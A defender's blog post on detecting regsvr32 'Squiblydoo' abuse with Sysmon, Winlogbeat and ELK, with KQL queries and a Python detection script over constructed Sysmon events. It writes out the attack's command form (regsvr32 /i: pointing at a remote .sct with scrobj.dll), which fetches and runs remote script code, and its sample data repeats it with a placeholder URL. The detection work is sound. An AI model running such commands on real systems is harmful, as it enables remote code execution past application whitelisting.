Today I wanted to write a quick blog post on how you can detect, with free and open source tools, attackers using regsvr32.exe to download scriptlet files from remote servers to get code execution in your environment.
First, I will cover how I set up my environment. It is a pretty basic environment: a Windows domain consisting of one domain controller, two workstations, and a Xubuntu machine running the ELK stack. On the workstations I have Sysmon installed through Group Policy, with PowerShell module logging and PowerShell script block logging enabled. Winlogbeat ships the event logs to Logstash, which forwards them to Elasticsearch for collection.
Now that I have explained a little bit of how my environment is set up, let's take a look at what T1218.010 – Regsvr32 is.
According to Red Canary, “Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a “Squiblydoo” attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)”
With this setup, the event IDs that fired for the attack were:
- Sysmon Event ID 1 – Process Create
- Sysmon Event ID 3 – Network Connection
- Sysmon Event ID 22 – DNS Query
- Microsoft-Windows-PowerShell/Operational (Windows\PowerShell\Operational in Event Viewer) Event ID 4104 – PowerShell Script Block Logging
Two caveats on that list. Sysmon only writes Event ID 3 if NetworkConnect logging is enabled in its configuration (it is off by default), so check your config before relying on it. And 4104 appears when the regsvr32 command line is entered in a PowerShell session, because script block logging records the command itself; regsvr32 does nothing with PowerShell, so a launch from cmd.exe or an Office macro leaves no 4104 behind.
Here is a screenshot of the command I ran on the Windows workstation. It follows the standard Squiblydoo form, regsvr32.exe /s /n /u /i:<URL of the .sct file> scrobj.dll: regsvr32 reaches out to GitHub to fetch the scriptlet file, and the script inside it launches calc.exe on the workstation.
Here are my Kibana (KQL) queries; the leading wildcard matches the binary regardless of its path, and KQL does not accept wildcards inside quotes, so the values are unquoted:
- winlog.event_id:1 AND winlog.event_data.ParentImage:*regsvr32.exe
- winlog.event_id:1 AND winlog.event_data.Image:*regsvr32.exe AND (winlog.event_data.ParentImage:*cmd.exe OR winlog.event_data.ParentImage:*powershell.exe)
The first query finds processes spawned by regsvr32 (calc.exe in this test); the second finds regsvr32 itself being launched from a shell. ParentImage is only populated on Event ID 1, so restricting the second query to that event ID changes nothing except making the intent explicit.
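To show what those two queries actually select, and where they get noisy, here is an added Python example that runs the same detection logic over a handful of constructed Sysmon events laid out like Winlogbeat's winlog fields. This is not code from the original post: the events, the ProcessGuid placeholders and the GitHub URL are made up, and the event data is trimmed to the fields the rules use. Beyond the two Kibana queries it adds a command-line check for the /i:<URL> ... scrobj.dll form and a per-process correlation of Event ID 1 with Event IDs 3 and 22, which is how you tell Squiblydoo apart from an administrator registering a local DLL.

```python
import re
from collections import defaultdict

# --- Constructed sample events (not real logs). Field names follow the
# winlog.* layout Winlogbeat uses for Sysmon; GUIDs are placeholders. ---
SAMPLE_EVENTS = [
    # Event ID 1: regsvr32 launched from PowerShell with a remote .sct (Squiblydoo form)
    {"winlog": {"event_id": 1, "event_data": {
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "regsvr32.exe /s /n /u /i:https://raw.githubusercontent.com/example/repo/main/calc.sct scrobj.dll",
        "ProcessGuid": "{GUID-ATTACK}"}}},
    # Event ID 22: DNS query made by that regsvr32 process
    {"winlog": {"event_id": 22, "event_data": {
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "QueryName": "raw.githubusercontent.com",
        "ProcessGuid": "{GUID-ATTACK}"}}},
    # Event ID 3: outbound connection by that regsvr32 process
    {"winlog": {"event_id": 3, "event_data": {
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "DestinationHostname": "raw.githubusercontent.com",
        "DestinationPort": "443",
        "ProcessGuid": "{GUID-ATTACK}"}}},
    # Event ID 1: the scriptlet's payload, calc.exe, spawned by regsvr32
    {"winlog": {"event_id": 1, "event_data": {
        "Image": r"C:\Windows\System32\calc.exe",
        "ParentImage": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": "calc.exe",
        "ProcessGuid": "{GUID-CALC}",
        "ParentProcessGuid": "{GUID-ATTACK}"}}},
    # Event ID 1: an administrator registering a local DLL from cmd.exe (benign noise)
    {"winlog": {"event_id": 1, "event_data": {
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
        "ProcessGuid": "{GUID-ADMIN}"}}},
]

REGSVR32 = "regsvr32.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# "/i:https://..." (or "-i:"): the switch that hands a remote URL to scrobj.dll.
REMOTE_SCRIPTLET = re.compile(r'[/-]i:"?https?://', re.IGNORECASE)
SCROBJ = re.compile(r"scrobj\.dll", re.IGNORECASE)


def _data(ev):
    return ev["winlog"]["event_data"]


def _event_id(ev):
    return ev["winlog"]["event_id"]


def image_name(path):
    """Basename of a Windows image path, lower-cased (accepts \\ or /)."""
    return re.split(r"[\\/]", path)[-1].lower()


def regsvr32_children(events):
    """Kibana query 1: Event ID 1 where regsvr32.exe is the parent."""
    return [ev for ev in events if _event_id(ev) == 1
            and image_name(_data(ev).get("ParentImage", "")) == REGSVR32]


def regsvr32_from_shell(events):
    """Kibana query 2: regsvr32.exe started by cmd.exe or powershell.exe.
    This is the noisy one: an admin registering a DLL from a shell matches too."""
    return [ev for ev in events if _event_id(ev) == 1
            and image_name(_data(ev).get("Image", "")) == REGSVR32
            and image_name(_data(ev).get("ParentImage", "")) in SHELLS]


def squiblydoo_command_lines(events):
    """Event ID 1 where regsvr32's command line points /i: at a URL or loads
    scrobj.dll. Parent-agnostic, so it also catches launches from Office or
    an installer."""
    hits = []
    for ev in events:
        d = _data(ev)
        if _event_id(ev) != 1 or image_name(d.get("Image", "")) != REGSVR32:
            continue
        cmd = d.get("CommandLine", "")
        if REMOTE_SCRIPTLET.search(cmd) or SCROBJ.search(cmd):
            hits.append(ev)
    return hits


def regsvr32_with_network(events):
    """Correlate by ProcessGuid: regsvr32.exe processes that also produced a
    DNS query (22) or a network connection (3). Registering a local DLL never
    needs the network, so this survives heavy admin usage."""
    by_guid = defaultdict(set)
    for ev in events:
        d = _data(ev)
        if image_name(d.get("Image", "")) == REGSVR32:
            by_guid[d.get("ProcessGuid")].add(_event_id(ev))
    return sorted(g for g, ids in by_guid.items() if 1 in ids and ids & {3, 22})


def detect(events):
    """Run every rule; return a sorted list of (rule, ProcessGuid) findings."""
    findings = set()
    for ev in regsvr32_children(events):
        findings.add(("child_of_regsvr32", _data(ev).get("ParentProcessGuid", "?")))
    for ev in regsvr32_from_shell(events):
        findings.add(("regsvr32_from_shell", _data(ev)["ProcessGuid"]))
    for ev in squiblydoo_command_lines(events):
        findings.add(("remote_scriptlet_cmdline", _data(ev)["ProcessGuid"]))
    for guid in regsvr32_with_network(events):
        findings.add(("regsvr32_network_activity", guid))
    return sorted(findings)


if __name__ == "__main__":
    for rule, guid in detect(SAMPLE_EVENTS):
        print(f"{rule:28} {guid}")
```

Run against the sample, the admin's {GUID-ADMIN} process trips only regsvr32_from_shell, while the attack process trips every rule; that gap is what you tune on. The ProcessGuid correlation is the one worth turning into a saved search or Logstash aggregate, since it needs no allowlist of parent processes at all.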
So in conclusion, basic detections can be built on a budget with free and open source tools. It is also important to know your environment: if administrators are slinging regsvr32 all over the place, the parent-process queries above will be noisy and will require more filtering, either in your Sysmon configuration or at your Logstash server. Legitimate DLL registration never needs the network, so regsvr32 making a DNS query (Event ID 22) or an outbound connection (Event ID 3), or a command line pointing /i: at a URL, is a much tighter signal than "regsvr32 launched from a shell". Until next time…